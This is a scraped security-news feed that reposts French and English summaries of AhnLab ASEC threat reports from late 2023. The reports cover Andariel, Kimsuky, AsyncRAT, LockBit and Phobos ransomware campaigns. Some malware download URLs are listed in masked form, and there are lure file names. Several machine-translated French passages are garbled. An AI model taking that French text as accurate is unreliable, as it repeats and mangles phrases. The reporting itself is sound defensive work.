In November 2023, AhnLab Security Emergency response Center (ASEC) published a blog post titled “Circumstances of the Andariel Group Exploiting an Apache ActiveMQ Vulnerability (CVE-2023-46604)” [1] which covered cases of the Andariel threat group exploiting the CVE-2023-46604 vulnerability to install malware. This post not only covered attack cases of the Andariel group but also those of HelloKitty Ransomware, Cobalt Strike, and Metasploit Meterpreter. Since then, the Apache ActiveMQ vulnerability (CVE-2023-46604) has continued to be exploited by various threat actors. This... ]]> 2023-12-19T01:22:36+00:00 https://asec.ahnlab.com/en/59904/ www.secnews.physaphae.fr/article.php?IdArticle=8425133 False Ransomware,Malware,Vulnerability,Threat None 3.0000000000000000 AhnLab - Korean Security Firm Les outils d'administration à distance sont des logiciels pour gérer et contrôler les terminaux dans des endroits distants.Les outils peuvent être utilisés comme solutions de travail à domicile dans des circonstances telles que la pandémie Covid-19 et dans le but de contrôler, de gérer et de réparer les appareils sans pilote à distance.Ces outils de télécommande utilisés à des fins légitimes sont appelés rat, ce qui signifie & # 8220; outils d'administration à distance. & # 8221;De plus, les types de logiciels malveillants de porte dérobée tels que Remcos Rat, NJRAT, Quasar Rat et Avemaria sont appelés chevaux de Troie à distance (rat) parce que ceux-ci le rendent également ...

---

Remote administration tools are software for managing and controlling terminals at remote locations. The tools can be used as work-at-home solutions in circumstances such as the COVID-19 pandemic and for the purpose of controlling, managing, and repairing unmanned devices remotely. Such remote control tools used for legitimate purposes are called RAT, meaning “Remote Administration Tools.” Additionally, backdoor malware types such as Remcos RAT, njRAT, Quasar RAT, and AveMaria are called Remote Access Trojans (RAT) because these also make it possible... ]]> 2023-12-15T01:31:05+00:00 https://asec.ahnlab.com/en/59834/ www.secnews.physaphae.fr/article.php?IdArticle=8422958 False Malware,Tool None 2.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Emergency Response Center (ASEC) a récemment identifié la distribution d'un fichier exe malveillant déguisé en matière liée au matériel lié au matérielÀ une fuite de données personnelles, ciblant les utilisateurs individuels.Le comportement final de ce logiciel malveillant n'a pas pu être observé car le C2 a été fermé, mais le malware est une porte dérobée qui reçoit des commandes obscurcies de l'acteur de menace et les exécute au format XML.Lorsque le fichier EXE malveillant est exécuté, les fichiers de la section .data sont créés dans le% ProgramData% ...

---

AhnLab Security Emergency response Center (ASEC) recently identified the distribution of a malicious exe file disguised as material related to a personal data leak, targeting individual users. The final behavior of this malware could not be observed because the C2 was closed, but the malware is a backdoor that receives obfuscated commands from the threat actor and executes them in xml format. When the malicious exe file is executed, the files in the .data section are created into the %Programdata%... ]]> 2023-12-11T07:35:53+00:00 https://asec.ahnlab.com/en/59763/ www.secnews.physaphae.fr/article.php?IdArticle=8420923 False Malware,Threat None 3.0000000000000000 AhnLab - Korean Security Firm Présentation de l'accès….2.1.Attaque de phishing de lance….2.2.LNK Malwareremote Control MALWWare….3.1.Xrat (chargeur)….3.2.Amadey….3.3.Derniers cas d'attaque …… ..3.3.1.Autoit Amadey …… .. 3.3.2.Rftratpost-infection….4.1.Keylogger….4.2.Infostaler….4.3.Other TypesConclusion 1. Overview The Kimsuky threat group, deemed to be supported by North Korea, has been active since 2013. At first, they attacked North Korea-related research institutes in South Korea before attacking a South Korean energy corporation in 2014. Cases ofLes attaques contre des pays autres que la Corée du Sud ont ...

---

OverviewInitial Access…. 2.1. Spear Phishing Attack…. 2.2. LNK MalwareRemote Control Malware…. 3.1. XRat (Loader)…. 3.2. Amadey…. 3.3. Latest Attack Cases…….. 3.3.1. AutoIt Amadey…….. 3.3.2. RftRATPost-infection…. 4.1. Keylogger…. 4.2. Infostealer…. 4.3. Other TypesConclusion 1. Overview The Kimsuky threat group, deemed to be supported by North Korea, has been active since 2013. At first, they attacked North Korea-related research institutes in South Korea before attacking a South Korean energy corporation in 2014. Cases of attacks against countries other than South Korea have... ]]> 2023-12-08T05:05:57+00:00 https://asec.ahnlab.com/en/59590/ www.secnews.physaphae.fr/article.php?IdArticle=8420105 False Malware,Threat None 2.0000000000000000 AhnLab - Korean Security Firm Dans ce rapport, nous couvrons des groupes de menaces dirigés par la nation présumés de mener du cyber-espionnage ou du sabotage sous le soutien du soutiendes gouvernements de certains pays, appelés groupes de menace persistante avancés (APT) & # 8221;Pour des raisons pratiques.Par conséquent, ce rapport ne contient pas d'informations sur les groupes de cybercrimins visant à obtenir des bénéfices financiers.Nous avons organisé des analyses liées aux groupes APT divulgués par des sociétés de sécurité et des institutions, notamment AHNLAB au cours du mois précédent;Cependant, le contenu de certains groupes APT peut ne pas ...

---

In this report, we cover nation-led threat groups presumed to conduct cyber espionage or sabotage under the support of the governments of certain countries, referred to as “Advanced Persistent Threat (APT) groups” for the sake of convenience. Therefore, this report does not contain information on cybercriminal groups aiming to gain financial profits. We organized analyses related to APT groups disclosed by security companies and institutions including AhnLab during the previous month; however, the content of some APT groups may not... ]]> 2023-12-08T05:00:33+00:00 https://asec.ahnlab.com/en/59737/ www.secnews.physaphae.fr/article.php?IdArticle=8420090 False Threat,Prediction None 2.0000000000000000 AhnLab - Korean Security Firm Ce rapport de tendance sur le Web Deep et le réseau sombre d'octobre 2023 est sectionné en ransomware, forums & # & #38;Marchés noirs et acteurs de menace.Nous tenons à dire à l'avance qu'une partie du contenu n'a pas encore été confirmée comme vraie.Ransomware & # 8211;Regard de la ruche?Hunters International & # 8211;NOESCAPE Ransomware Gang & # 8211;Ragnarlocker DLS fermé & # 8211;Trigona disparaît Forum & # 38;Marché noir & # 8211;La base de données 23andMe a fui et vendu & # 8211;Violation du système de support d'Okta \\ détecté ...

---

This trend report on the deep web and dark web of October 2023 is sectioned into Ransomware, Forums & Black Markets, and Threat Actors. We would like to state beforehand that some of the content has yet to be confirmed to be true. Ransomware – Rebrand of Hive? Hunters International – NoEscape Ransomware Gang – RagnarLocker DLS Shut Down – Trigona Disappears Forum & Black Market – 23andMe Database Leaked and Being Sold – Breach of Okta\'s Support System Detected... ]]> 2023-12-08T05:00:12+00:00 https://asec.ahnlab.com/en/59741/ www.secnews.physaphae.fr/article.php?IdArticle=8420091 False Ransomware,Threat,Prediction None 3.0000000000000000 AhnLab - Korean Security Firm Les activités de Kimsuky en octobre 2023 ont légèrement diminué par rapport à leurs activités globales en septembre en septembre.Un domaine de phishing a été découvert, mais parce qu'il utilise l'infrastructure BabyShark, il a été classé comme type BabyShark.Il y avait aussi un type composé où Flowerpower et RandomQuery étaient distribués simultanément.Enfin, davantage de changements dans le système de fleurs via une fragmentation du script ont été observés.2023_OCT_THREAT TREND RAPPORT SUR KIMSUKY GROUP

---

The Kimsuky group’s activities in October 2023 decreased slightly in comparison to their overall activities in September. One phishing domain was discovered, but because it uses the BabyShark infrastructure, it was classified as the BabyShark type. There was also a compound type where FlowerPower and RandomQuery were distributed simultaneously. Finally, more changes to the FlowerPower system via script fragmentation were observed. 2023_Oct_Threat Trend Report on Kimsuky Group ]]> 2023-12-08T04:59:47+00:00 https://asec.ahnlab.com/en/59745/ www.secnews.physaphae.fr/article.php?IdArticle=8420092 False Threat,Prediction None 3.0000000000000000 AhnLab - Korean Security Firm Ce rapport fournit des statistiques sur le nombre de nouveaux échantillons de ransomware, des systèmes ciblés et des entreprises ciblées en octobre 2023, ainsi que des problèmes de ransomware notables en Corée et dans d'autres pays.Tendances clés 1) Hellokitty Ransomware & # 8217; s Code source fuite 2) Attaques de ransomware contre le serveur WS_FTP non corrigé 3) BlackCat Ransomware utilise & # 8216; Munchkin & # 8217;Alpine Linux VM 4) Autres 2023_OCT_THERAT RAPPORT DE TENDANCE SUR LES STATISTIQUES RANSOMWAGIES ET LES MAJEURS INSCULTATIONS

---

This report provides statistics on the number of new ransomware samples, targeted systems, and targeted businesses in October 2023, as well as notable ransomware issues in Korea and other countries. Key Trends 1) HelloKitty Ransomware’s Source Code Leaked 2) Ransomware Attacks Against Unpatched WS_FTP Server 3) BlackCat Ransomware Uses ‘Munchkin’ Alpine Linux VM 4) Others 2023_Oct_Threat Trend Report on Ransomware Statistics and Major Issues ]]> 2023-12-08T04:58:39+00:00 https://asec.ahnlab.com/en/59751/ www.secnews.physaphae.fr/article.php?IdArticle=8420093 False Ransomware,Threat,Prediction None 2.0000000000000000 AhnLab - Korean Security Firm L'équipe d'analyse du centre d'intervention d'urgence (ASEC) AHNLAB (ASEC) a précédemment publié sur l'asyncrat distribué via des fichiers avec leextension .chm.[1] Il a été récemment découvert que ce type de logiciel malveillant asyncrat est maintenant distribué au format de script WSF.Le fichier WSF s'est avéré être distribué dans un format de fichier compressé (.zip) via les URL contenues dans les e-mails.[Télécharger les URL] 1.https: //*****************.com.br/pay5baea1wp7.zip2.https: //**********.za.com/order_ed333c91f0fd.zip3.https: //*************.com/pay37846wp.zip4.https: //*****.****.co/ebills37890913.zip décompressant le premier fichier zip téléchargé donne un fichier avec une extension de fichier .wsf.Ce fichier se compose principalement de ...

---

The AhnLab Security Emergency response Center (ASEC) analysis team previously posted about AsyncRAT being distributed via files with the .chm extension. [1] It was recently discovered that this type of AsyncRAT malware is now being distributed in WSF script format. The WSF file was found to be distributed in a compressed file (.zip) format through URLs contained within emails. [Download URLs]1. https://*****************.com.br/Pay5baea1WP7.zip2. https://************.za.com/Order_ed333c91f0fd.zip3. https://*************.com/PAY37846wp.zip4. https://*****.****.co/eBills37890913.zip Decompressing the first downloaded zip file yields a file with a .wsf file extension. This file mostly consists of... ]]> 2023-12-06T00:16:37+00:00 https://asec.ahnlab.com/en/59573/ www.secnews.physaphae.fr/article.php?IdArticle=8419413 False Malware None 3.0000000000000000 AhnLab - Korean Security Firm Un service de bureau à distance fait référence à la fonctionnalité qui permet le contrôle à distance d'autres PC.Dans Windows, ce service est fourni par défaut via le protocole de bureau distant (RDP).Cela signifie que si le système cible est un environnement Windows, RDP peut être utilisé pour contrôler cette cible distante sans avoir à installer des outils de télécommande supplémentaires.Pour la télécommande, l'opérateur doit avoir des informations d'identification de compte pour le système cible et se connecter à l'aide de ces informations d'identification.En tant que tel, si ...

---

A remote desktop service refers to the feature that allows remote control of other PCs. In Windows, this service is provided by default through Remote Desktop Protocol (RDP). This means that if the target system is a Windows environment, RDP can be used to control this remote target without having to install additional remote control tools. For remote control, the operator is required to have account credentials for the target system and log in using these credentials. As such, if... ]]> 2023-12-04T01:13:29+00:00 https://asec.ahnlab.com/en/59439/ www.secnews.physaphae.fr/article.php?IdArticle=8418891 False Ransomware,Tool None 2.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Emergency Response Center (ASEC) a récemment identifié que le groupe de menaces Kimsuky distribue un JSE malveillant JSE malveillantDiscuisé en tant que déclaration d'importation aux instituts de recherche en Corée du Sud.L'acteur de menace utilise finalement une porte dérobée pour voler des informations et exécuter des commandes.Le nom de fichier du compte-gouttes déguisé en déclaration d'importation est le suivant.Le fichier contient un script PowerShell obscurcis, un fichier de porte dérobée codé en base64 et un fichier PDF légitime.Un fichier PDF légitime est enregistré ...

---

AhnLab Security Emergency response Center (ASEC) has recently identified that the Kimsuky threat group is distributing a malicious JSE file disguised as an import declaration to research institutes in South Korea. The threat actor ultimately uses a backdoor to steal information and execute commands. The file name of the dropper disguised as an import declaration is as follows. The file contains an obfuscated PowerShell script, a Base64-encoded backdoor file, and a legitimate PDF file. A legitimate PDF file is saved... ]]> 2023-11-30T00:03:57+00:00 https://asec.ahnlab.com/en/59387/ www.secnews.physaphae.fr/article.php?IdArticle=8417935 False Threat None 2.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Emergency Response Center (ASEC) a découvert un cas de distribution de logiciels malveillants en utilisant les ventes d'informations personnelles comme appât.Ce cas d'attaque utilise une technique de piratage d'ingénierie sociale.L'ASEC vous fournit des circonstances récemment découvertes de distribution de logiciels malveillants à l'aide de techniques de piratage d'ingénierie sociale.La figure 1 montre le contenu du site Web utilisé par l'acteur de menace comme site de distribution, avec plusieurs fichiers.La plupart des fichiers contiennent des informations personnelles, et les noms de fichiers incluent des mots clés liés à l'investissement tels que & # 8216; Reading, & # 8217;& # 8216; Unfactted, & # 8217; ...

---

AhnLab Security Emergency response Center (ASEC) discovered a case of malware distribution using personal information sales as bait. This attack case employs a social engineering hacking technique. ASEC provides you with recently discovered circumstances of malware distribution using social engineering hacking techniques. Figure 1 shows the content of the website used by the threat actor as a distribution site, with multiple files. Most of the files contain personal information, and the file names include investment-related keywords such as ‘reading,’ ‘unlisted,’... ]]> 2023-11-29T23:36:38+00:00 https://asec.ahnlab.com/en/59379/ www.secnews.physaphae.fr/article.php?IdArticle=8417936 False Malware,Threat None 2.0000000000000000 AhnLab - Korean Security Firm tout en surveillant les attaques récentes du groupe de menace Andariel, le centre d'intervention d'urgence de sécurité Ahnlab (ASEC) a découvert que le Centre d'AndarieAttaquer le cas dans lequel le groupe est supposé exploiter la vulnérabilité de l'exécution du code distant Apache ActiveMQ (CVE-2023-46604) pour installer des logiciels malveillants.Le groupe Andariel Threat cible généralement les entreprises et les institutions sud-coréennes, et le groupe est connu pour être soit dans une relation coopérative du groupe de menaces de Lazare, soit dans un groupe subsidiaire de Lazarus.Leurs attaques contre la Corée du Sud ont été les premières ...

---

While monitoring recent attacks by the Andariel threat group, AhnLab Security Emergency response Center (ASEC) has discovered the attack case in which the group is assumed to be exploiting Apache ActiveMQ remote code execution vulnerability (CVE-2023-46604) to install malware. The Andariel threat group usually targets South Korean companies and institutions, and the group is known to be either in a cooperative relationship of the Lazarus threat group, or a subsidiary group of Lazarus. Their attacks against South Korea were first... ]]> 2023-11-27T01:16:58+00:00 https://asec.ahnlab.com/en/59318/ www.secnews.physaphae.fr/article.php?IdArticle=8417067 False None APT 38 2.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Emergency Response Center (ASEC) surveillait les attaques contre les serveurs Web vulnérables qui ont des vulnérabilités non corrigées ouêtre mal géré.Étant donné que les serveurs Web sont exposés à l'extérieur dans le but de fournir des services Web à tous les utilisateurs disponibles, ceux-ci deviennent des objectifs d'attaque majeurs pour les acteurs de la menace.Les principaux exemples de services Web qui prennent en charge les environnements Windows incluent les services d'information Internet (IIS), Apache, Apache Tomcat et Nginx.Bien que le service Web Apache soit généralement utilisé dans les environnements Linux, il y en a ...

---

AhnLab Security Emergency response Center (ASEC) is monitoring attacks against vulnerable web servers that have unpatched vulnerabilities or are being poorly managed. Because web servers are externally exposed for the purpose of providing web services to all available users, these become major attack targets for threat actors. Major examples of web services that support Windows environments include Internet Information Services (IIS), Apache, Apache Tomcat, and Nginx. While the Apache web service is usually used in Linux environments, there are some... ]]> 2023-11-20T08:47:33+00:00 https://asec.ahnlab.com/en/59110/ www.secnews.physaphae.fr/article.php?IdArticle=8414751 False Vulnerability,Threat,Technical None 3.0000000000000000 AhnLab - Korean Security Firm Récemment, AhnLab Security Response Center (ASEC) a identifié un fichier LNK malveillant distribué à financier etPersonnel de Blockchain Corporation par e-mail et autres façons.Le fichier LNK malveillant est distribué via URL et AHNLAB Smart Defence (ASD) a confirmé les URL suivantes.Le fichier téléchargé est un fichier compressé nommé & # 8220; Blockchain Corporate Solution Handbook Production.zip & # 8221;.L'acteur de menace a alternativement téléchargé un fichier malveillant et un fichier légitime sur les URL, provoquant une confusion dans l'analyse.Quand le malveillant ...

---

Recently, AhnLab Security Emergency response Center (ASEC) has identified a malicious LNK file being distributed to financial and blockchain corporation personnel through email and other ways. The malicious LNK file is distributed via URLs and AhnLab Smart Defense (ASD) has confirmed the following URLs. The file being downloaded is a compressed file named “Blockchain Corporate Solution Handbook Production.zip”. The threat actor alternately uploaded a malicious file and a legitimate file at the URLs, causing confusion in analysis. When the malicious... ]]> 2023-11-20T07:55:44+00:00 https://asec.ahnlab.com/en/59057/ www.secnews.physaphae.fr/article.php?IdArticle=8414728 False Threat,Technical None 2.0000000000000000 AhnLab - Korean Security Firm L'équipe d'analyse ASEC a identifié les circonstances du groupe Andariel distribuant des logiciels malveillants via une attaque en utilisant une certaine gestion des actifsprogramme.Le groupe Andariel est connu pour être dans une relation coopérative avec ou une organisation filiale du groupe Lazare.Le groupe Andariel lance généralement des attaques de phishing de lance, d'arrosage ou de chaîne d'approvisionnement pour la pénétration initiale.Il existe également un cas où le groupe a exploité une solution de gestion centrale pendant le processus d'installation de logiciels malveillants.Récemment, le groupe Andariel ...

---

The ASEC analysis team identified the circumstances of the Andariel group distributing malware via an attack using a certain asset management program. The Andariel group is known to be in a cooperative relationship with or a subsidiary organization of the Lazarus group. The Andariel group usually launches spear phishing, watering hole, or supply chain attacks for initial penetration. There is also a case where the group exploited a central management solution during the malware installation process. Recently, the Andariel group... ]]> 2023-11-20T06:31:18+00:00 https://asec.ahnlab.com/en/59073/ www.secnews.physaphae.fr/article.php?IdArticle=8414705 False Malware,Technical APT 38,APT 38 3.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Emergency Response Center (ASEC) a observé la distribution des dossiers de raccourci malveillant (* .lnk)une organisation publique.L'acteur de menace semble distribuer un fichier de script malveillant (HTML) déguisé en e-mail de sécurité en le joignant aux e-mails.Ceux-ci ciblent généralement les individus dans le domaine de la réunification coréenne et de la sécurité nationale.Notamment, ceux-ci étaient déguisés par des sujets de paiement honoraire pour les faire ressembler à des documents légitimes.La méthode de fonctionnement des logiciels malveillants et le format C2 sont similaires à ceux ...

---

AhnLab Security Emergency response Center (ASEC) observed the distribution of malicious shortcut (*.lnk) files impersonating a public organization. The threat actor seems to be distributing a malicious script (HTML) file disguised as a security email by attaching it to emails. These usually target individuals in the field of Korean reunification and national security. Notably, these were disguised with topics of honorarium payment to make them seem like legitimate documents. The malware’s operation method and C2 format are similar to those... ]]> 2023-11-14T22:42:05+00:00 https://asec.ahnlab.com/en/59042/ www.secnews.physaphae.fr/article.php?IdArticle=8412109 False Malware,Threat None 2.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Emergency Response Center (ASEC) a détecté les circonstances d'une souche malveillante distribuée par des sites Web légitimes violés en utilisant des sites Web légitimes en utilisant à l'aide en utilisant des sites Web légitimes viodés en utilisant en utilisant des sites Web légitimes en utilisant en utilisant des sites Web légitimes viodés en utilisant en utilisant des sites Web légitimes à l'aide d'une utilisation légitime en utilisant en utilisant en utilisant des sites Web légitimes viodés en utilisant en utilisant des sites Web légitimes à l'aide de WANGITEMDivers noms de fichiers, incitant les utilisateurs à les exécuter.Ce message présentera comment AHNLAB EDR analyse et détecte la méthode de distribution de logiciels malveillants à l'aide de fichiers LNK comme support, une méthode qui a été utilisée souvent ces derniers temps.Pomerium Project Related Inquiry Data.txt.lnkdata concernant la demande de modifications avant l'accord IRIS 2023.txt.lnksUyeon OH Statement Data.txt.lnkon Confirmation.txt.lnkdeep Brain Ai Interview Guide.txt.lnkrecruitment ...

---

AhnLab Security Emergency response Center (ASEC) detected circumstances of a malware strain being distributed through breached legitimate websites using various file names, prompting users to run them. This post will introduce how AhnLab EDR analyzes and detects the method of malware distribution using LNK files as the medium, a method that has been employed often in recent times. Pomerium Project Related Inquiry Data.txt.lnkData Regarding Application for Changes Before the 2023 Iris Agreement.txt.lnkSuyeon Oh Statement Data.txt.lnkOn Inquiry Confirmation.txt.lnkDeep Brain AI Interview Guide.txt.lnkRecruitment... ]]> 2023-11-14T00:52:29+00:00 https://asec.ahnlab.com/en/58919/ www.secnews.physaphae.fr/article.php?IdArticle=8411398 False Malware None 2.0000000000000000 AhnLab - Korean Security Firm The AhnLab Security Emergency response Center’s (ASEC) analysis team is constantly monitoring malware distributed toServeurs de base de données vulnérables.MySQL Server est l'un des principaux serveurs de base de données qui fournit la fonctionnalité de la gestion de grandes quantités de données dans un environnement d'entreprise ou d'utilisateur.En règle générale, dans les environnements Windows, MS-SQL est principalement installé pour les services de base de données, tandis que dans les environnements Linux, des services de base de données comme MySQL et PostgreSQL sont utilisés.Cependant, bien que ce ne soit pas aussi souvent que les serveurs MS-SQL, il y a des cas où les serveurs MySQL ...

---

The AhnLab Security Emergency response Center’s (ASEC) analysis team is constantly monitoring malware distributed to vulnerable database servers. MySQL server is one of the main database servers that provides the feature of managing large amounts of data in a corporate or user environment. Typically, in Windows environments, MS-SQL is primarily installed for database services, while in Linux environments, database services like MySQL and PostgreSQL are used. However, although not as frequently as MS-SQL servers, there are instances where MySQL servers... ]]> 2023-11-14T00:19:00+00:00 https://asec.ahnlab.com/en/58878/ www.secnews.physaphae.fr/article.php?IdArticle=8411399 False Malware None 2.0000000000000000 AhnLab - Korean Security Firm Dans ce rapport, nous couvrons des groupes de menaces dirigés par la nation présumés de mener du cyber-espionnage ou du sabotage sous le soutien du soutiendes gouvernements de certains pays, appelés groupes de menace persistante avancés (APT) & # 8221;Pour des raisons pratiques.Par conséquent, ce rapport ne contient pas d'informations sur les groupes de cybercrimins visant à obtenir des bénéfices financiers.Nous avons organisé des analyses liées aux groupes APT divulgués par des sociétés de sécurité et des institutions, notamment AHNLAB au cours du mois précédent;Cependant, le contenu de certains groupes APT peut ne pas ...

---

In this report, we cover nation-led threat groups presumed to conduct cyber espionage or sabotage under the support of the governments of certain countries, referred to as “Advanced Persistent Threat (APT) groups” for the sake of convenience. Therefore, this report does not contain information on cybercriminal groups aiming to gain financial profits. We organized analyses related to APT groups disclosed by security companies and institutions including AhnLab during the previous month; however, the content of some APT groups may not... ]]> 2023-11-13T01:42:44+00:00 https://asec.ahnlab.com/en/59011/ www.secnews.physaphae.fr/article.php?IdArticle=8410648 False Threat,Prediction None 2.0000000000000000 AhnLab - Korean Security Firm Ce rapport fournit des statistiques sur le nombre de nouveaux échantillons de ransomware, des systèmes ciblés et des entreprises ciblées en septembre 2023, ainsi que des problèmes de ransomware notables en Corée et dans d'autres pays.Tendances clés 1) diminution nette des entreprises ciblées liées aux ransomwares de CloP et à Moveit 2) Ransomware de Noescape et ses imitations 3) Ransomware Group utilisant le RGPD comme bluff (GDPR GAMBIT) 4) Autres SEP_Trente Rapport sur les statistiques de rançon et les principaux problèmes

---

This report provides statistics on the number of new ransomware samples, targeted systems, and targeted businesses in September 2023, as well as notable ransomware issues in Korea and other countries. Key Trends 1) Sharp Decrease in Targeted Businesses Related to CLOP Ransomware and MOVEit 2) NoEscape Ransomware and Its Imitations 3) Ransomware Group Using GDPR as a Bluff (GDPR Gambit) 4) Others Sep_Threat Trend Report on Ransomware Statistics and Major Issues ]]> 2023-11-13T01:42:17+00:00 https://asec.ahnlab.com/en/59026/ www.secnews.physaphae.fr/article.php?IdArticle=8410649 False Ransomware,Threat,Prediction None 3.0000000000000000 AhnLab - Korean Security Firm Les activités de Kimsuky Group & # 8217; en septembre 2023 ont montré une augmentation notable du type RandomQuery, tandis que, tandis que, tandis que, tandis queLes activités d'autres types étaient relativement faibles ou inexistantes.& # 160;SEP_TRÉTERAT TREND RAPPORT SUR KIMSUKY GROUP

---

The Kimsuky group’s activities in September 2023 showed a notable surge in the RandomQuery type, while the activities of other types were relatively low or non-existent.   Sep_Threat Trend Report on Kimsuky Group ]]> 2023-11-13T01:41:52+00:00 https://asec.ahnlab.com/en/59020/ www.secnews.physaphae.fr/article.php?IdArticle=8410650 False Threat,Prediction None 3.0000000000000000 AhnLab - Korean Security Firm Ce rapport de tendance sur le Web Deep et le Web Dark de septembre 2023 est sectionné en ransomware, forums & # & #38;Marchés noirs et acteurs de menace.Nous tenons à dire à l'avance qu'une partie du contenu n'a pas encore été confirmée comme vraie.Ransomware & # 8211;Akira & # 8211;Alphv (Blackcat) & # 8211;Lockbit & # 8211;Forum Ransomedvc & # 38;Marché noir & # 8211;Violation de données affectant 7 millions d'utilisateurs & # 8211;Les informations personnelles des policiers ont divulgué l'acteur de menace & # 8211;Poursuite des individus associés au ...

---

This trend report on the deep web and dark web of September 2023 is sectioned into Ransomware, Forums & Black Markets, and Threat Actors. We would like to state beforehand that some of the content has yet to be confirmed to be true. Ransomware – Akira – ALPHV (BlackCat) – LockBit – RansomedVC Forum & Black Market – Data Breach Affecting 7 Million Users – Personal Information of Police Officers Leaked Threat Actor – Prosecution of Individuals Associated with the... ]]> 2023-11-13T01:41:34+00:00 https://asec.ahnlab.com/en/59016/ www.secnews.physaphae.fr/article.php?IdArticle=8410651 False Ransomware,Data Breach,Threat,Prediction None 3.0000000000000000 AhnLab - Korean Security Firm La méthode de distribution impliquant l'identité des CV est l'une des principales méthodes utilisées par les ransomwares de verrouillage.Les informations liées à cela ont été partagées via le blog ASEC en février de cette année.[1] Contrairement au passé où seul le ransomware de verrouillage a été distribué, il a été confirmé qu'un infostecteur est également inclus dans les distributions récentes.[2] (Ce lien est uniquement disponible en coréen.) & # 8216; ressume16.egg & # 8217;Maintient le ransomware de verrouillage déguisé en fichier pdf ...

---

The distribution method involving the impersonation of resumes is one of the main methods used by the LockBit ransomware. Information related to this has been shared through the ASEC Blog in February of this year. [1] In contrast to the past where only the LockBit ransomware was distributed, it has been confirmed that an Infostealer is also being included in recent distributions. [2] (This link is only available in Korean.) ‘Resume16.egg’ holds the LockBit ransomware disguised as a PDF file... ]]> 2023-11-08T08:02:49+00:00 https://asec.ahnlab.com/en/58750/ www.secnews.physaphae.fr/article.php?IdArticle=8407721 False Ransomware None 4.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Emergency Response Center (ASEC) a récemment découvert la distribution active des ransomwares de phobos.Phobos est une variante connue pour partager des similitudes techniques et opérationnelles avec les ransomwares Dharma et Crysis.Ces souches de ransomware ciblent généralement les services de protocole de bureau à distance externe en externe (RDP) avec des titres vulnérables en tant que vecteurs d'attaque.Compte tenu de la présence fréquente de la distribution des ransomwares qui exploite ces RDP vulnérables comme points d'accès initiaux, il est conseillé aux administrateurs d'être prudents.[1] [2] [3] 1. Présentation du ransomware phobos Phobos Ransomware ...

---

AhnLab Security Emergency response Center (ASEC) has recently discovered the active distribution of the Phobos ransomware. Phobos is a variant known for sharing technical and operational similarities with the Dharma and CrySis ransomware. These ransomware strains typically target externally exposed Remote Desktop Protocol (RDP) services with vulnerable securities as attack vectors. Given the frequent occurrence of ransomware distribution that leverages these vulnerable RDPs as initial access points, administrators are advised to be cautious. [1] [2] [3] 1. Phobos Ransomware Overview Phobos ransomware... ]]> 2023-11-08T07:33:45+00:00 https://asec.ahnlab.com/en/58753/ www.secnews.physaphae.fr/article.php?IdArticle=8407722 False Ransomware,Technical None 3.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Emergency Response Center (ASEC) a observé la distribution des fichiers PDF qui contiennent des URL malveillants.Les domaines liés à partir des fichiers PDF indiquent que des PDF similaires sont distribués sous le couvert de téléchargement de certains jeux ou de versions de crack de fichiers de programme.Vous trouverez ci-dessous une liste de certains des fichiers PDF qui sont distribués.Cliquez sur le bouton dans les fichiers PDF distribués connecte les utilisateurs à une URL malveillante.La figure ci-dessous est l'écran affiché ...

---

AhnLab Security Emergency response Center (ASEC) observed the distribution of PDF files that contain malicious URLs. The domains linked from the PDF files indicate that similar PDFs are being distributed under the guise of downloading certain games or crack versions of program files. Below is a list of some of the PDF files that are being distributed. Clicking the button within the distributed PDF files connects users to a malicious URL. The figure below is the screen that is displayed... ]]> 2023-11-08T06:34:52+00:00 https://asec.ahnlab.com/en/58660/ www.secnews.physaphae.fr/article.php?IdArticle=8407697 False None None 2.0000000000000000 AhnLab - Korean Security Firm Le 3 mai 2022, Ahnlab a publié une analyse sur le blog ASEC sous le titre & # 8220;Distribution du fichier de mots malveillant lié à la Corée du Nord & # 8217; s défilé militaire du 25 avril & # 8221;.[+] Analyse des logiciels malveillants déguisés avec un contenu de défilé militaire: https://asec.ahnlab.com/en/33936/ Ce rapport est basé sur 17 mois de suivi et d'analyse des activités de piratage de Kimsuky Group & # 8217;, gestion, envoyer des e-mails de piratage, distribution de logiciels malveillants, etc.) qui partagent des modèles similaires avec les principales caractéristiques (c2, shells web, etc.) expliqués dans l'analyse ci-dessus ....

---

On May 3rd, 2022, AhnLab posted an analysis on the ASEC blog under the title “Distribution of Malicious Word File Related to North Korea’s April 25th Military Parade”. [+] Analysis of Malware Disguised with Military Parade Content: https://asec.ahnlab.com/en/33936/ This report is based on 17 months of tracking and analysis of the Kimsuky group’s hacking activities (C2 operations, management, sending hacking emails, distributing malware, etc.) that share similar patterns with the major characteristics (C2, web shells, etc.) explained in the analysis above.... ]]> 2023-11-08T05:55:29+00:00 https://asec.ahnlab.com/en/58654/ www.secnews.physaphae.fr/article.php?IdArticle=8407670 False Malware None 2.0000000000000000 AhnLab - Korean Security Firm La prudence est informée en tant qu'infostaler qui invite l'exécution de fichiers EXE légitimes est activement distribué.L'acteur de menace distribue un fichier EXE légitime avec une signature valide et une DLL malveillante compressée dans le même répertoire.Le fichier EXE lui-même est légitime, mais lorsqu'il est exécuté dans le même répertoire que la DLL malveillante, il exécute automatiquement cette DLL malveillante.Cette technique est appelée détournement de DLL et est souvent utilisée dans la distribution des logiciels malveillants.La distribution ...

---

Caution is advised as an Infostealer that prompts the execution of legitimate EXE files is actively being distributed. The threat actor is distributing a legitimate EXE file with a valid signature and a malicious DLL compressed in the same directory. The EXE file itself is legitimate, but when executed in the same directory as the malicious DLL, it automatically runs that malicious DLL. This technique is called DLL hijacking and is often used in the distribution of malware. The distribution... ]]> 2023-11-01T04:29:21+00:00 https://asec.ahnlab.com/en/58319/ www.secnews.physaphae.fr/article.php?IdArticle=8403877 False Threat None 2.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Emergency Response Center (ASEC) a trouvé des documents HWP qui étaient intégrés à des objets OLE, ciblant les individus dansdes secteurs spécifiques tels que la défense nationale et la presse.Le malware est présumé être distribué principalement via des URL de téléchargement ou des pièces jointes dans les e-mails.Les noms de dossiers des documents distribués sont pertinents pour les domaines de la défense nationale, de l'unification, de l'éducation et de la radiodiffusion, ce qui suggère que le malware cible les professionnels impliqués dans ces domaines.Les documents HWP analysés dans ce post en grande partie ...

---

